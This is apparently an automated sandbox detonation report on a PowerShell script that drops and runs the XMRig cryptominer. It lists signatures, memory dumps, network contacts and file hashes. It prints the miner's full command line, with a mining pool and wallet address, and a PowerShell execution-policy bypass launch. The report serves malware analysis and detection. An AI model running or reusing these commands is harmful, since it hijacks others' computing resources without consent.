memory/4536-56-0x00007FFA19890000-0x00007FFA1A351000-memory.dmp
memory/4272-57-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-59-0x000002CA8B070000-0x000002CA8B090000-memory.dmp
memory/4272-58-0x000002CA8B050000-0x000002CA8B070000-memory.dmp
memory/4272-60-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-61-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-62-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-63-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-64-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-65-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-66-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-67-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-68-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-69-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-70-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-71-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-72-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-73-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-74-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-75-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-76-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-77-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-78-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-79-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-80-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-81-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-82-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-83-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-84-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-85-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-86-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-87-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-88-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-89-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-90-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-91-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-92-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-93-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-94-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-95-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-96-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-97-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-98-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-99-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-100-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-101-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-102-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-103-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-104-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-105-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-106-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-107-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-108-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-109-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-110-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-111-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-112-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-113-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-114-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-115-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-116-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-117-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
memory/4272-118-0x00007FF6D3790000-0x00007FF6D43C3000-memory.dmp
Analysis: behavioral5
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:31
Platform
win10-20240404-en
Max time kernel
1795s
Max time network
1773s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4760 wrote to memory of 620 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4760 wrote to memory of 620 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 214.143.182.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.107.17.2.in-addr.arpa | udp |
Files
memory/4760-3-0x00007FFC5D583000-0x00007FFC5D584000-memory.dmp
memory/4760-5-0x0000026EC9240000-0x0000026EC9262000-memory.dmp
memory/4760-8-0x00007FFC5D580000-0x00007FFC5DF6C000-memory.dmp
memory/4760-9-0x0000026EC9370000-0x0000026EC93E6000-memory.dmp
memory/4760-10-0x00007FFC5D580000-0x00007FFC5DF6C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t50wrzui.ysu.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4760-25-0x00007FFC5D580000-0x00007FFC5DF6C000-memory.dmp
memory/4760-48-0x0000026EC9140000-0x0000026EC9152000-memory.dmp
memory/4760-61-0x0000026EC90D0000-0x0000026EC90DA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/620-90-0x000001CBAAC90000-0x000001CBAACB0000-memory.dmp
memory/4760-92-0x00007FFC5D583000-0x00007FFC5D584000-memory.dmp
memory/620-91-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/4760-93-0x00007FFC5D580000-0x00007FFC5DF6C000-memory.dmp
memory/4760-95-0x00007FFC5D580000-0x00007FFC5DF6C000-memory.dmp
memory/620-94-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-96-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-97-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-98-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-99-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-100-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-101-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-102-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-103-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-104-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-105-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-106-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-107-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-108-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-109-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-110-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-111-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-112-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-113-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-114-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-115-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-116-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-117-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-118-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-119-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-120-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-121-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-122-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-123-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-124-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-125-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-126-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-127-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-128-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-129-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-130-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-131-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-132-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-133-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-134-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-135-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-136-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-137-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-138-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-139-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-140-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-141-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-142-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-143-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-144-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-145-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-146-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-147-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-148-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-149-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-150-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-151-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-152-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-153-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-154-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-155-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
memory/620-156-0x00007FF70AFD0000-0x00007FF70BC03000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:37
Platform
win10-20240404-en
Max time kernel
1798s
Max time network
1800s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5044 wrote to memory of 2020 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 5044 wrote to memory of 2020 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 52.111.227.14:443 | tcp | |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.143.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
Files
memory/5044-3-0x00007FFE783E3000-0x00007FFE783E4000-memory.dmp
memory/5044-5-0x00000236E4470000-0x00000236E4492000-memory.dmp
memory/5044-8-0x00007FFE783E0000-0x00007FFE78DCC000-memory.dmp
memory/5044-10-0x00007FFE783E0000-0x00007FFE78DCC000-memory.dmp
memory/5044-9-0x00000236E4520000-0x00000236E4596000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ati2gfja.d3q.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/5044-25-0x00007FFE783E0000-0x00007FFE78DCC000-memory.dmp
memory/5044-48-0x00000236E46A0000-0x00000236E46B2000-memory.dmp
memory/5044-61-0x00000236E4500000-0x00000236E450A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2020-90-0x000001B2B1A10000-0x000001B2B1A30000-memory.dmp
memory/2020-91-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-92-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/5044-93-0x00007FFE783E0000-0x00007FFE78DCC000-memory.dmp
memory/5044-94-0x00007FFE783E3000-0x00007FFE783E4000-memory.dmp
memory/5044-95-0x00007FFE783E0000-0x00007FFE78DCC000-memory.dmp
memory/5044-96-0x00007FFE783E0000-0x00007FFE78DCC000-memory.dmp
memory/2020-97-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-98-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-99-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-100-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-101-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-102-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-103-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-104-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-105-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-106-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-107-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-108-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-109-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-110-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-111-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-112-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-113-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-114-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-115-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-116-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-117-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-118-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-119-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-120-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-121-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-122-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-123-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-124-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-125-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-126-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-127-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-128-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-129-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-130-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-131-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-132-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-133-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-134-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-135-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-136-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-137-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-138-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-139-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-140-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
memory/2020-141-0x00007FF6EF050000-0x00007FF6EFC83000-memory.dmp
